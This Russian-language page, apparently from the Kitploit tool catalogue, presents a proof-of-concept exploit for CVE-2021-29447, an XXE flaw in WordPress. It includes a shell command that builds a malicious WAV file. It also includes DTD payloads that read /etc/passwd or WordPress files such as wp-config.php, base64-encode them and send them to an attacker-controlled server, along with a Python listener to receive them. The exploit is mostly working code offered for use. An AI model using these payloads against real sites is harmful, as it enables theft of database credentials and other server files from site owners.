Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/assassinukg/cve-2021-29447
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

Доказательство концепции эксплуатации для CVE-2021-29447, уязвимости XXE в WordPress, позволяющей произвольное раскрытие файлов и SSRF через специально созданные WAV-файлы.

Репозиторий
15 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-29447

Воздействие

Раскрытие произвольных файлов: содержимое любого файла в файловой системе хоста может быть получено, например, wp-config.php, который содержит конфиденциальные данные, такие как учетные данные базы данных. Server-Side Request Forgery (SSRF): HTTP-запросы могут быть выполнены от имени установки WordPress. В зависимости от окружения это может иметь серьезные последствия. Эксплуатация уязвимости

Сайт WordPress, подверженный данной уязвимости, был идентифицирован в процессе разведки с помощью инструмента wpscan.

изображение

Создание вредоносного WAV-файла.

Это очень просто, в вашей консоли bash:

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

На вашем атакующем ПК создайте dtd с кодом, выполняемым на веб-сервере.

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Примечание: для чтения файлов WordPress используйте синтаксис "../WP-FILE.php"

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Запустите Python-сервер в каталоге с файлами (python3 -m http.server 8081)

Ссылки:

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

Скачать инструмент